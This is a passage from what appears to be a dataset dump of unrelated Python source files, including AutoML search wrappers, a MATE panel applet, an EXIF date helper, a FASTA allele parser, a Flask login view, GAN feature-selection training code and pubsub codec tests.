greater_is_better=should_maximize(self.specification['performanceMetric']))\n # self.system_params['scoring'] = scorer\n self.system_params['n_jobs'] = 1\n\n automl = {\n 'REGRESSION': tpot.TPOTRegressor,\n 'CLASSIFICATION': tpot.TPOTClassifier\n }[self.specification['problem']['taskType']](**self.system_params)\n\n automl.fit(stimulus, dataframe[y])\n\n # selected models along the cost-complexity vs accuracy frontier\n for model_str in automl.pareto_front_fitted_pipelines_:\n model = ModelSklearn(\n automl.pareto_front_fitted_pipelines_[model_str],\n system='tpot',\n search_id=self.search_id,\n predictors=X,\n targets=[y],\n preprocess=preprocessor,\n task=self.specification['problem']['taskType'])\n model.save()\n\n from tworaven_apps.solver_interfaces.tasks import FOUND_MODEL_CALLBACKS\n FOUND_MODEL_CALLBACKS[self.callback_found](model, **(self.callback_arguments or {}))\n\n return {\n KEY_SUCCESS: True,\n KEY_MESSAGE: 'search complete',\n KEY_DATA: {\n 'search_id': self.search_id,\n 'system': 'tpot'\n }\n }\n\n\nclass SearchMLBox(Search):\n system = 'mlbox'\n FAST_DEBUG = os.environ.get('AUTOML_FAST_DEBUG', 'no') == 'yes'\n\n def run(self):\n import mlbox.model.regression\n\n dataset = Dataset(self.specification['input'])\n\n dataframe = dataset.get_dataframe().dropna()\n X = self.specification['problem']['predictors']\n y = self.specification['problem']['targets'][0]\n\n stimulus, preprocessor = preprocess(dataframe, self.specification)\n\n strategies = {\n 'REGRESSION': [\"LightGBM\", \"RandomForest\", \"ExtraTrees\", \"Tree\", \"Bagging\", \"AdaBoost\", \"Linear\"],\n 'CLASSIFICATION': [\"LightGBM\", \"RandomForest\", \"ExtraTrees\", \"Tree\", \"Bagging\", \"AdaBoost\", \"Linear\"],\n }\n\n if self.FAST_DEBUG:\n strategies = {\n 'REGRESSION': [\"RandomForest\"],\n 'CLASSIFICATION': [\"RandomForest\"],\n }\n\n solver = {\n 'REGRESSION': mlbox.model.regression.Regressor,\n 'CLASSIFICATION': mlbox.model.classification.Classifier\n }\n\n for strategy in strategies[self.specification['problem']['taskType']]:\n automl = solver[self.specification['problem']['taskType']](strategy=strategy, **self.system_params)\n\n if issubclass(type(stimulus), csr_matrix):\n stimulus = stimulus.toarray()\n\n automl.fit(df_train=pandas.DataFrame(stimulus), y_train=dataframe[y])\n\n model = ModelSklearn(\n automl,\n system='mlbox',\n search_id=self.search_id,\n predictors=X,\n targets=[y],\n preprocess=preprocessor,\n task=self.specification['problem']['taskType'])\n model.save()\n\n from tworaven_apps.solver_interfaces.tasks import FOUND_MODEL_CALLBACKS\n FOUND_MODEL_CALLBACKS[self.callback_found](model, **(self.callback_arguments or {}))\n\n return {\n KEY_SUCCESS: True,\n KEY_MESSAGE: 'search complete',\n KEY_DATA: {\n 'search_id': self.search_id,\n 'system': 'mlbox'\n }\n }\n\n\nclass SearchLudwig(Search):\n system = 'ludwig'\n\n def run(self):\n from ludwig.api import LudwigModel\n\n dataset = Dataset(self.specification['input'])\n\n dataframe = dataset.get_dataframe()\n predictors = self.specification['problem']['predictors']\n targets = self.specification['problem']['targets']\n\n target_type = {\n \"REGRESSION\": 'numerical',\n \"CLASSIFICATION\": 'category'\n }[self.specification['problem']['taskType']]\n\n if self.specification['problem']['taskType'] == 'CLASSIFICATION':\n dataframe[targets[0]] = dataframe[targets[0]].astype(str)\n\n # https://github.com/uber/ludwig/blob/master/tests/integration_tests/utils.py\n model_definition = {\n \"input_features\": [{\n \"name\": predictor,\n \"type\": 'category' if predictor in self.specification['problem']['categorical'] else 'numerical'\n } for predictor in predictors],\n \"output_features\": [{\"name\": target, \"type\": target_type} for target in targets]\n }\n\n automl = LudwigModel(model_definition)\n\n train_statistics = automl.train(dataframe)\n\n print('train_statistics')\n print(train_statistics)\n\n model = ModelLudwig(\n automl,\n search_id=self.search_id,\n predictors=predictors,\n targets=targets,\n task=self.specification['problem']['taskType'])\n\n model.save()\n\n from tworaven_apps.solver_interfaces.tasks import FOUND_MODEL_CALLBACKS\n FOUND_MODEL_CALLBACKS[self.callback_found](model, **(self.callback_arguments or {}))\n\n return {\n KEY_SUCCESS: True,\n KEY_MESSAGE: 'search complete',\n KEY_DATA: {\n 'search_id': self.search_id,\n 'system': 'ludwig'\n }\n }\n\n\nclass SearchMLJarSupervised(Search):\n system = 'mljar-supervised'\n\n def run(self):\n from supervised.automl import AutoML\n\n dataset = Dataset(self.specification['input'])\n\n dataframe = dataset.get_dataframe().dropna()\n X = self.specification['problem']['predictors']\n y = self.specification['problem']['targets'][0]\n\n stimulus, preprocessor = preprocess(dataframe, self.specification)\n\n if self.specification.get('timeBoundSearch'):\n self.system_params['total_time_limit'] = self.specification['timeBoundSearch']\n\n if self.specification.get('timeBoundRun'):\n self.system_params['learner_time_limit'] = self.specification['timeBoundRun']\n\n automl = AutoML(**self.system_params)\n\n # mljar seems kind of fragile?\n stimulus = pandas.DataFrame(stimulus)\n stimulus.columns = [str(i).strip() for i in stimulus.columns]\n\n automl.fit(stimulus, dataframe[y])\n\n for model_mljar in sorted(automl._models, key=lambda m: m.get_final_loss())[:4]:\n model = ModelSklearn(\n model_mljar,\n system='mljar-supervised',\n search_id=self.search_id,\n predictors=X,\n targets=[y],\n preprocess=preprocessor,\n task=self.specification['problem']['taskType'])\n\n model.save()\n\n from tworaven_apps.solver_interfaces.tasks import FOUND_MODEL_CALLBACKS\n FOUND_MODEL_CALLBACKS[self.callback_found](model, **(self.callback_arguments or {}))\n\n return {\n KEY_SUCCESS: True,\n KEY_MESSAGE: 'search complete',\n KEY_DATA: {\n 'search_id': self.search_id,\n 'system': 'mljar-supervised'\n }\n }\n\n\nclass SearchTwoRavens(Search):\n system = 'TwoRavens'\n\n def run(self):\n from tworaven_apps.solver_interfaces.tasks import pipeline_task\n import tworaven_solver\n\n # make sure time isn't in the predictor or target variables\n problem_specification = self.specification['problem']\n time_column = problem_specification.get('forecastingHorizon', {}).get(\"column\")\n for variable_set in ['targets', 'predictors']:\n if time_column and time_column in problem_specification[variable_set]:\n problem_specification[variable_set].remove(time_column)\n\n # if self.specification['problem']['taskType'] == 'FORECASTING':\n # # make time series regular\n # dataframe = tworaven_solver.format_dataframe_time_index(\n # dataframe=tworaven_solver.Dataset(self.specification['input']).get_dataframe(),\n # date=time_column,\n # granularity_specification=self.specification['problem'].get('timeGranularity'))\n #\n # # save regular time series to disk\n # imputed_dataframe_dir = os.path.join(self.specification['temp_directory'], self.search_id)\n # imputed_dataframe_path = os.path.join(imputed_dataframe_dir, 'trainData.csv')\n # os.makedirs(imputed_dataframe_dir, exist_ok=True)\n # dataframe.to_csv(imputed_dataframe_path, quoting=csv.QUOTE_NONNUMERIC)\n #\n # # update specification to point to new time series\n # self.specification['input'] = {\n # 'name': self.specification['input'].get('name', 'train'),\n # 'resource_uri': 'file://' + imputed_dataframe_path\n # }\n\n manager = tworaven_solver.SearchManager(\n problem_specification=problem_specification,\n system_params=self.system_params)\n\n signatures = []\n while True:\n pipeline_specification = manager.get_pipeline_specification()\n if not pipeline_specification:\n break\n\n signatures.append(pipeline_task.s(\n search_id=self.search_id,\n train_specification=self.specification,\n pipeline_specification=pipeline_specification,\n callback_name=self.callback_found,\n callback_arguments=self.callback_arguments))\n\n result = group(*signatures)()\n with allow_join_result():\n result.join()\n\n return {\n KEY_SUCCESS: True,\n KEY_MESSAGE: 'search complete',\n KEY_DATA: {\n 'search_id': self.search_id,\n 'system': 'TwoRavens'\n }\n }\n","sub_path":"tworaven_apps/solver_interfaces/util_search.py","file_name":"util_search.py","file_ext":"py","file_size_in_byte":21194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"483701652","text":"#!/usr/bin/env python\n\n# https://www.systutorials.com/docs/linux/man/1-mate-panel-test-applets/\n\nimport signal\nsignal.signal(signal.SIGINT, signal.SIG_DFL)\n\n# https://github.com/city41/mate-i3-applet/blob/master/log.py\n\n\nimport os\nimport sys\nimport logging\n\ndef exception_handler(type, value, traceback):\n logging.exception(\"Uncaught exception occurred: {}\".format(value))\n\nlogger = logging.getLogger(\"TestAppletLog\")\n\n#logger.setLevel(logging.WARNING)\nlogger.setLevel(logging.DEBUG)\n\nsys.excepthook = exception_handler\n\nfile_handler = logging.FileHandler(os.path.expanduser(\"~/.testapplet.log\"))\nfile_handler.setFormatter(\n logging.Formatter('[%(levelname)s] %(asctime)s: %(message)s', \"%Y-%m-%d %H:%M:%S\")\n)\nlogger.addHandler(file_handler)\n\n#-------------------------------------------------------------------------------\n\nimport gi\ngi.require_version(\"Gtk\", \"3.0\")\ngi.require_version('MatePanelApplet', '4.0')\nfrom gi.repository import Gtk\nfrom gi.repository import MatePanelApplet\nfrom gi.repository import Gdk\n\n \ndef applet_fill(applet):\n #logger.debug(\"applet_fill\")\n #logger.debug(str(applet))\n \n # you can use this path with gio/gsettings\n settings_path = applet.get_preferences_path()\n\n box = Gtk.Box()\n applet.add(box)\n\n label = Gtk.Label(label=\"Label\")\n box.add(label)\n \n #button = Gtk.Button(label=\"Dialog\")\n #button.connect('clicked', show_dialog)\n #button.connect('clicked', create_menu, applet)\n #button.connect(\"button-press-event\", showMenu, applet)\n #button.connect(\"clicked\", showMenu, applet)\n #box.add(button)\n\n #button = Gtk.Button(label=\"Quit\")\n #button.connect('clicked', Gtk.main_quit)\n #box.add(button)\n\n #applet.add_menu(build_menu())\n applet.show_all()\n\n append_menu(applet)\n\n \n#def create_menu(widget, event, applet):\n# f = open('log', 'w')\n# f.write(str(widget)+'\\n')\n# f.write(str(event)+'\\n')\n# f.write(str(applet)+'\\n')\n# f.close()\n\n# menu_xml='' \n# menu_xml='''\n#\t\t\t\n#\t\t\t''' \n# verbs = [(\"About\", showAboutDialog)]\n# applet.setup_menu(menu_xml, verbs, None)\n\n\ndef show_menu(widget, event, applet):\n # https://developer.gnome.org/gdk3/stable/gdk3-Event-Structures.html#GdkEventButton\n\n logging.debug(\"show_menu\")\n \n #if event.type == Gdk.EventType.BUTTON_PRESS and event.button == 1:\n if event.button == 1:\n logging.debug(\"show_menu - button 1\")\n #showMainDialog()\n #show_dialog(widget)\n create_menu(applet)\n #if event.type == Gdk.EventType.BUTTON_PRESS and event.button == 3:\n# elif event.button == 3:\n# logging.debug(\"show_menu - button 3\")\n# widget.emit_stop_by_name(\"button-press-event\")\n# create_menu(applet)\n\n\ndef append_menu(applet):\n logging.debug(\"append_menu\")\n\n #propxml=\"\"\"\n # \n #\t\t\t\"\"\"\n\n\t\t\t \n # https://github.com/mate-desktop/mate-applets/blob/master/mateweather/mateweather-applet.c\n # https://github.com/mate-desktop/mate-applets/blob/master/mateweather/mateweather-applet-menu.xml\n\n menu_xml=\"\"\"\n \n \n \"\"\"\n\t\t\t\n actions = [\n ('AboutAction', None, 'About Test Applet', None, None, show_dialog), \n ('QuitAction', None, 'Quit Test Applet', None, None, Gtk.main_quit), \n ]\n \n action_group = Gtk.ActionGroup(\"TestApplet\") \n action_group.add_actions(actions, applet)\n applet.setup_menu(menu_xml, action_group)\n\n\ndef show_dialog(widget, event=None):\n logging.debug(\"show_dialog\")\n logging.debug(str(widget))\n logging.debug(str(event))\n\n win = Gtk.Window()\n win.connect('destroy', Gtk.main_quit)\n win.show_all()\n\n Gtk.main()\n\n \ndef applet_factory(applet, iid, data):\n if iid != \"TestApplet\":\n return False\n \n applet_fill(applet)\n \n return True\n\nMatePanelApplet.Applet.factory_main(\"TestAppletFactory\", True,\n MatePanelApplet.Applet.__gtype__,\n applet_factory, None)\n\n","sub_path":"other-my-applets/panel-applet/testapplet.py","file_name":"testapplet.py","file_ext":"py","file_size_in_byte":4376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"519576173","text":"\"\"\"Get/set EXIF dates from photos\"\"\"\n\nimport exifread\nfrom icloudpd.logger import setup_logger\nimport datetime\n\n\ndef get_photo_exif(path):\n \"\"\"Get EXIF date for a photo, returning None on error\"\"\"\n try:\n with open(path, 'rb') as file:\n exif_dict = exifread.process_file(file, details=False, stop_tag='DateTimeOriginal')\n exif_date_tag = exif_dict.get('EXIF DateTimeOriginal')\n if exif_date_tag:\n return str(exif_date_tag)\n else:\n return None\n except Exception as e:\n logger = setup_logger()\n logger.debug(\"%s fetching EXIF data for %s\", e.__class__.__name__, path)\n return None\n\n\ndef exif_to_unix_local(exif_date):\n # strptime returns in local timezone\n return datetime.datetime.strptime(exif_date, \"%Y:%m:%d %H:%M:%S\").timestamp()\n","sub_path":"icloudpd/exif_datetime.py","file_name":"exif_datetime.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"653415031","text":"#!/usr/bin/env python2\nimport logging\nlogger = logging.getLogger()\nfrom collections import defaultdict\nimport argparse\nimport sys\nimport os\nfrom Bio import SeqIO\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"Given a list of FASTA files with novel alleles found with MentaLiST, output a FASTA with a unique list of novel alleles.\")\n # parser.add_argument(\"-s\", nargs=\"+\", help=\"New scheme fasta files, to compare if the novel allees are present.\")\n parser.add_argument(\"-f\", nargs=\"+\", help=\"Fasta files with novel alleles.\")\n parser.add_argument(\"-o\", type=str, help=\"Output Fasta file with alleles above the threshold requirement(s).\")\n parser.add_argument(\"-t\", \"--threshold\", type=int, default=5, help=\"Minimum number of different samples to appear, to include a novel allele in the output fasta.\")\n parser.add_argument(\"-m\", \"--mutation\", type=int, default=0, help=\"Also include if novel allel has equal or less than this number of mutations, regardless of times seen. Disabled by default.\")\n parser.add_argument('-ll', '--loglevel', type=str, default=\"INFO\", choices=['DEBUG','INFO','WARNING','ERROR','CRITICAL'], help='Set the logging level')\n param = parser.parse_args()\n logging.basicConfig(level=param.loglevel, format='%(asctime)s (%(relativeCreated)d ms) -> %(levelname)s:%(message)s', datefmt='%I:%M:%S %p')\n\n logger.info(\"Reading the new alleles ...\")\n # novel = defaultdict(lambda : defaultdict(int))\n novel = defaultdict(lambda : defaultdict(list))\n loci = set()\n for f in param.f:\n # get mutations:\n with open(f[:-2] + \"txt\") as mutfile:\n mutations = {locus:nmut for locus, ab, nmut, desc in [l.strip().split(\"\\t\") for l in mutfile]}\n logger.debug(\"Opening file %s ...\" % f)\n for seq_record in SeqIO.parse(f, \"fasta\"):\n locus = seq_record.id\n dna = str(seq_record.seq)\n loci.add(locus)\n novel[locus][dna].append(int(mutations[locus]))\n\n logger.info(\"Writing output ...\")\n output_fasta = []\n print(\"Locus\\tAlleles found\\tSamples x (mutations)\")\n for locus in sorted(loci):\n output_fasta.extend([(locus,seq) for seq, l in novel[locus].items() if (len(l) >= param.threshold or min(l) <= param.mutation)])\n print(\"%s\\t%d\\t%s\" % (locus, len(novel[locus]), \", \".join([\"%dx (%d)\" % (len(l),min(l)) for seq, l in sorted(novel[locus].items(), key=lambda x:len(x[1]), reverse=True)])))\n if param.o:\n with open(param.o, \"wb\") as f:\n for locus, seq in output_fasta:\n print >> f, (\">%s\\n%s\" % (locus, seq))\n\n logger.info(\"Done.\")\n","sub_path":"scripts/parse_novel_alleles.py","file_name":"parse_novel_alleles.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"409027083","text":"s = input()\ndiff = 0\nfor i in range(len(s)):\n if i % 2 == 0:\n if s[i] == \"R\" or s[i] == \"U\" or s[i] == \"D\":\n continue\n else:\n diff += 1\n if i % 2 == 1:\n if s[i] == \"L\" or s[i] == \"U\" or s[i] == \"D\":\n continue\n else:\n diff += 1\nif diff == 0:\n print(\"Yes\")\nelse:\n print(\"No\")","sub_path":"Python_codes/p02910/s624628197.py","file_name":"s624628197.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"191865469","text":"from flask import abort, redirect, request\nimport json as _json\n\nfrom api import DiscordApiClient\nfrom utils.flask import my_render_template\nfrom .app import app\n\ndef login():\n if request.method == 'GET':\n if app._client:\n return redirect(\"/home\")\n else:\n login_failed = _json.loads(request.args.get('login_failed', 'false'))\n return my_render_template(\"login.html\", login_failed=login_failed)\n else:\n if app._client:\n abort(400)\n else:\n data = request.form\n try:\n app._client = DiscordApiClient(data['email'], data['password'])\n return redirect(\"/home\")\n except RuntimeError:\n return redirect(\"/login?login_failed=true\")","sub_path":"app/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"540441396","text":"# ===============================================================================\n# Copyright 2018 ross\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ===============================================================================\nfrom chaco.plot_containers import HPlotContainer\nfrom enable.component_editor import ComponentEditor\nfrom traits.api import HasTraits, Instance\nfrom traitsui.api import View, UItem\n\nfrom pychron.graph.stacked_graph import StackedGraph\nfrom pychron.graph.stacked_regression_graph import StackedRegressionGraph\n\n\nclass RegressionView(HasTraits):\n name = 'Regressions'\n container = Instance(HPlotContainer)\n\n def initialize(self, an):\n an.load_raw_data()\n self.setup_graph(an)\n\n def setup_graph(self, an):\n\n container = HPlotContainer()\n\n container_dict = {'spacing': 5, 'stack_order': 'top_to_bottom'}\n sg = StackedGraph(container_dict=container_dict)\n sg.plotcontainer.spacing = 5\n sg.plotcontainer.stack_order = 'top_to_bottom'\n\n isos = an.sorted_values(reverse=False)\n add_sniff = True\n\n sisos = [iso for iso in isos if iso.sniff.offset_xs.shape[0]]\n for i, iso in enumerate(sisos):\n sniff = iso.sniff\n sg.new_plot(ytitle=iso.name, xtitle='Time (s)', title='Equilibration')\n sg.new_series(sniff.offset_xs, sniff.ys, marker='circle', type='scatter')\n sg.set_y_limits(pad='0.1', plotid=i)\n sg.set_x_limits(min_=0, max_=max(sniff.offset_xs) * 1.05, plotid=i)\n\n bg = StackedRegressionGraph(container_dict=container_dict)\n add_baseline = True\n\n ig = StackedRegressionGraph(container_dict=container_dict)\n\n iisos = [iso for iso in isos if iso.offset_xs.shape[0]]\n baselines = []\n for i, iso in enumerate(iisos):\n if iso.baseline.offset_xs.shape[0]:\n baselines.append(iso.baseline)\n ig.new_plot(ytitle='{}({})'.format(iso.name, iso.detector), xtitle='Time (s)', title='Isotope')\n ig.new_series(iso.offset_xs, iso.ys,\n display_filter_bounds=True,\n filter_outliers_dict=iso.filter_outliers_dict,\n color='blue', type='scatter', fit=iso.efit)\n ig.set_regressor(iso.regressor, i)\n ig.set_y_limits(pad='0.1', plotid=i)\n ig.set_x_limits(min_=0, max_=max(iso.offset_xs) * 1.05, plotid=i)\n\n ig.refresh()\n\n # bisos = [iso for iso in isos if iso.baseline.offset_xs.shape[0]]\n # plotted_baselines = []\n # for i, iso in enumerate(bisos):\n # baseline = iso.baseline\n # if baseline.detector in plotted_baselines:\n # continue\n # plotted_baselines.append(baseline.detector)\n\n # for iso in bisos:\n for i, baseline in enumerate(baselines):\n\n bg.new_plot(ytitle=baseline.detector, xtitle='Time (s)', title='Baseline')\n bg.new_series(baseline.offset_xs, baseline.ys,\n filter_outliers_dict=baseline.filter_outliers_dict,\n display_filter_bounds=True,\n color='red', type='scatter', fit=baseline.efit)\n bg.set_regressor(baseline.regressor, i)\n bg.set_y_limits(pad='0.1', plotid=i)\n bg.set_x_limits(pad='0.025', plotid=i)\n\n bg.refresh()\n\n container.add(sg.plotcontainer)\n container.add(ig.plotcontainer)\n container.add(bg.plotcontainer)\n\n self.container = container\n\n def traits_view(self):\n v = View(UItem('container', style='custom', editor=ComponentEditor()),\n resizable=True)\n return v\n\n# ============= EOF =============================================\n","sub_path":"pychron/processing/analyses/view/regression_view.py","file_name":"regression_view.py","file_ext":"py","file_size_in_byte":4283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"383668291","text":"# encoding= \"utf-8\"\nimport torch\nfrom feature_selection.tools import set_requires_grad, testing\nimport torch.optim as optim\nfrom tqdm import tqdm\nimport numpy as np\nimport torch.nn as nn\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.use(\"TKagg\")\n\n\ndef train_disc(disc, true, fake, optimizer, threshold, device, gan_loss, labels=None):\n set_requires_grad(disc, True)\n\n optimizer.zero_grad()\n\n if labels is not None:\n decision_fake = disc(torch.cat([fake, labels], dim=1))\n decision_true = disc(torch.cat([true, labels], dim=1))\n else:\n decision_fake = disc(fake)\n decision_true = disc(true)\n\n zeroes = torch.zeros(decision_fake.shape[0], 1).float().to(device)\n disc_fake_loss = 0.5 * gan_loss(decision_fake, zeroes)\n\n ones = torch.ones(decision_fake.shape[0], 1).float().to(device)\n disc_true_loss = 0.5 * gan_loss(decision_true, ones)\n\n disc_loss = disc_fake_loss + disc_true_loss\n\n if disc_fake_loss.mean() > threshold:\n disc_loss.backward()\n optimizer.step()\n\n return decision_fake.mean().item(), decision_true.mean().item()\n\n\ndef train_gen(gen, disc, input, optimizer, disc_conditional, gan_loss, device, data=None, **kwargs):\n gen.train()\n set_requires_grad(gen, True)\n set_requires_grad(disc, False)\n optimizer.zero_grad()\n\n generation = gen.forward(input)\n\n input = kwargs.get(\"channelwise_input\", input)\n\n if disc_conditional:\n fake_decision = disc.forward(torch.cat([generation, input], dim=1))\n else:\n fake_decision = disc.forward(generation)\n\n true_label = torch.ones(fake_decision.shape[0], 1).float().to(device)\n\n gan_loss = gan_loss(fake_decision, true_label)\n\n if data is not None:\n mu_l1 = kwargs.get(\"mu_l1\")\n\n if mu_l1:\n supervision_loss = mu_l1 * torch.abs(generation - data).mean()\n gan_loss += supervision_loss\n supervision_loss = supervision_loss.item()\n\n else:\n supervision_loss = 0.\n\n gan_loss.backward()\n optimizer.step()\n\n return supervision_loss, fake_decision.mean()\n\n\ndef mask_concrete(mask, revelator):\n \"\"\"\n retrieve a mask 'like' for concrete autoencoder\n\n :param data_loader:\n :param revelator:\n :return:\n\n \"\"\"\n im_size = int(np.sqrt(revelator.in_features))\n mask = mask.sum(dim=1)[0].view(1, 1, im_size, im_size)\n return mask\n\n\ngan_loss = nn.BCELoss(reduction=\"mean\")\n\n\ndef train_gan(gen, disc, revelator, epochs, train_loader, test_sample, device,\n g_step=1, d_step=2, rev_step=1, mu_sparse=1e-4,\n mu_reconstruction=100, threshold=0.1, save_path=None, inc_rate=1e-5,\n lr_g=1e-4, lr_d=1e-5,\n base_epochs=0, t_min=0.05, t_init=10.,\n max_regul=1e-2):\n\n disc_losses = []\n gen_losses = []\n reveal_losses = []\n true_zeros = []\n true_ones = []\n training_over = 0\n\n G_optimizer = optim.Adam(gen.parameters(), lr=lr_g, betas=(0.8, 0.9))\n D_optimizer = optim.Adam(disc.parameters(), lr=lr_d, betas=(0.8, 0.9))\n O_optimizer = optim.Adam(revelator.parameters(), lr=4e-4, betas=(0.7, 0.9))\n\n try:\n for epoch in range(epochs):\n\n revelator.temp = t_init * (t_min / t_init) ** (epoch / epochs)\n print(\"new temperature for revelator: {}\".format(revelator.temp))\n\n if (epoch + 1) % 30 == 0:\n lr_g = lr_g / 1.1\n lr_d = lr_d / 1.1\n G_optimizer = optim.Adam(\n gen.parameters(), lr=lr_g, betas=(0.9, 0.9))\n D_optimizer = optim.Adam(\n disc.parameters(), lr=lr_d, betas=(0.9, 0.9))\n O_optimizer = optim.Adam(\n revelator.parameters(), lr=lr_d, betas=(0.8, 0.9))\n\n if (epoch + 1) % 2 == 0 and not training_over:\n mu_sparse = min(mu_sparse + inc_rate, max_regul)\n\n for bt, (data) in enumerate(tqdm(train_loader)):\n data = data.to(device)\n ##############################\n # DISCRIMINATOR TRAINING\n\n if bt % d_step == 0:\n # get fake data\n with torch.no_grad():\n if revelator.name == \"concrete_ae\" and data.shape[1] == 3:\n\n random_channel = np.random.randint(0, 3)\n corrupted_data, reveal_mask = revelator.get_mask(\n data[:, random_channel, :, :].unsqueeze(1),\n grad=False)\n\n else:\n corrupted_data, reveal_mask = revelator.get_mask(\n data, grad=False)\n\n fake_data = gen.forward(corrupted_data)\n\n # add conditionnal information\n if revelator.name == \"concrete_ae\":\n # need to get only one channel for concrete ae\n with torch.no_grad():\n labels = mask_concrete(reveal_mask, revelator)\n labels = labels * data\n labels = labels.detach()\n else:\n labels = corrupted_data.detach()\n\n des_fake, des_true = train_disc(disc, true=data, fake=fake_data,\n optimizer=D_optimizer, threshold=threshold,\n device=device, gan_loss=gan_loss,\n labels=labels)\n disc_losses.append(des_fake)\n\n ##########################\n # GENERATOR TRAINING\n if bt % g_step == 0:\n\n if revelator.name == \"concrete_ae\" and data.shape[1] == 3:\n random_channel = np.random.randint(0, 3)\n corrupted_data, reveal_mask = revelator.get_mask(\n data[:, random_channel, :, :].unsqueeze(1), grad=True)\n\n else:\n corrupted_data, reveal_mask = revelator.get_mask(\n data, grad=True)\n\n kwargs = {\"mu_l1\": mu_reconstruction}\n if revelator.name == \"concrete_ae\":\n labels = mask_concrete(reveal_mask, revelator)\n labels = labels * data\n kwargs[\"channelwise_input\"] = labels\n\n reconstruction_loss, _ = train_gen(gen=gen, disc=disc, input=corrupted_data,\n optimizer=G_optimizer, disc_conditional=True,\n gan_loss=gan_loss, device=device,\n data=data, **kwargs)\n G_optimizer.step()\n G_optimizer.zero_grad()\n\n O_optimizer.step()\n O_optimizer.zero_grad()\n gen_losses.append(reconstruction_loss)\n\n ##########################\n # Sampling TRAINING\n\n if bt % rev_step == 0 and revelator.name != \"param_optim\":\n sparse_loss = mu_sparse * revelator.l_0_cost()\n sparse_loss.backward()\n reveal_losses.append(sparse_loss.item())\n O_optimizer.step()\n O_optimizer.zero_grad()\n\n # RECORD THE FORM OF THE MASK\n true_zeros.append((reveal_mask == 0).float().mean().item())\n true_ones.append((reveal_mask == 1).float().mean().item())\n\n else:\n true_zeros.append(1)\n true_zeros.append(0)\n\n print(\"epoch {}, \\n disc_loss: {}, gen_reconstruction_loss: {} \\n\"\n \"number of true zeros: {} number of true ones: {}, mu_sparse: {} \"\n \"reveal_loss\".format(epoch, np.mean(disc_losses[-10:]), np.mean(gen_losses[:-10]),\n np.mean(true_zeros[-5:]), np.mean(true_ones[-5:]), mu_sparse,\n np.mean(reveal_losses[-5:])))\n\n # SAVE MASK UNDER CONSTANT z\n _, mask_cst = revelator.get_mask(data, grad=False, fixed=True)\n fig = plt.figure(figsize=(6, 6))\n ax = plt.subplot(111)\n ax.imshow(mask_cst[0, 0].detach().cpu(), cmap=plt.cm.gray)\n ax.axis(\"off\")\n try:\n fig.savefig(save_path + \"mask_{}.pdf\".format(epoch))\n plt.close(fig)\n except:\n print(\"unable to save mask\")\n\n if (epoch + 1) % 3 == 0 and save_path is not None:\n testing(gen=gen, revelator=revelator,\n test_sample=test_sample,\n device=device, save_path=save_path + \"epoch_{}.png\".format(epoch + base_epochs))\n\n except KeyboardInterrupt:\n return gen_losses\n\n return gen_losses\n","sub_path":"feature_selection/train_tools_gan.py","file_name":"train_tools_gan.py","file_ext":"py","file_size_in_byte":9092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"212478197","text":"def ii():return int(input())\ndef iim():return map(int,input().split())\ndef iil():return list(map(int,input().split()))\nimport numba\nimport time\n\nstart_time = time.perf_counter()\n\n\n@numba.njit\ndef sieve_of_erastosthenes(num):\n input_list = [False if i % 2 == 0 or i % 3 == 0 or i % 5 == 0 else True for i in range(num)]\n input_list[0] = input_list[1] = False\n input_list[2] = input_list[3] = input_list[5] = True\n sqrt = num**0.5\n\n for serial in range(3, num, 2):\n if serial >= sqrt:\n prime_list = [i for i, b in enumerate(input_list) if b == True]\n return prime_list\n\n for s in range(serial ** 2, num, serial):\n input_list[s] = False\n\n@numba.njit\ndef solve(n):\n ans = 1\n l = sieve_of_erastosthenes(n+1)\n for i in range(2,n+1):\n num = i\n fac = 1\n for j in l:\n cnt = 1\n while num%j==0:\n num //= j\n cnt +=1\n fac *= cnt\n if num == 1:\n break\n ans += i*fac\n return ans\n\nn = ii()\nprint(solve(n))\nprint(\"perf_counter = {:.7f}\".format(time.perf_counter() - start_time))\n","sub_path":"ABC/ABC172/d_rev.py","file_name":"d_rev.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"25359973","text":"\"\"\"\nCodec tests.\n\n\"\"\"\nfrom json import dumps, loads\nfrom operator import itemgetter\n\nfrom hamcrest import (\n assert_that,\n calling,\n equal_to,\n instance_of,\n is_,\n raises,\n)\nfrom marshmallow import ValidationError\nfrom microcosm.api import create_object_graph\n\nfrom microcosm_pubsub.tests.fixtures import FooSchema\n\n\ndef test_no_default_schema():\n \"\"\"\n An unknown message type will fail.\n\n \"\"\"\n graph = create_object_graph(\"example\", testing=True)\n assert_that(\n calling(itemgetter(\"bar\")).with_args(graph.pubsub_message_schema_registry),\n raises(KeyError),\n )\n\n\ndef test_custom_schema():\n \"\"\"\n A configured message type will use its schema.\n\n \"\"\"\n graph = create_object_graph(\"example\", testing=True)\n codec = graph.pubsub_message_schema_registry[FooSchema.MEDIA_TYPE]\n assert_that(codec.schema, is_(instance_of(FooSchema)))\n\n\ndef test_encode():\n \"\"\"\n A message will be encoded according to its schema.\n\n \"\"\"\n graph = create_object_graph(\"example\", testing=True)\n 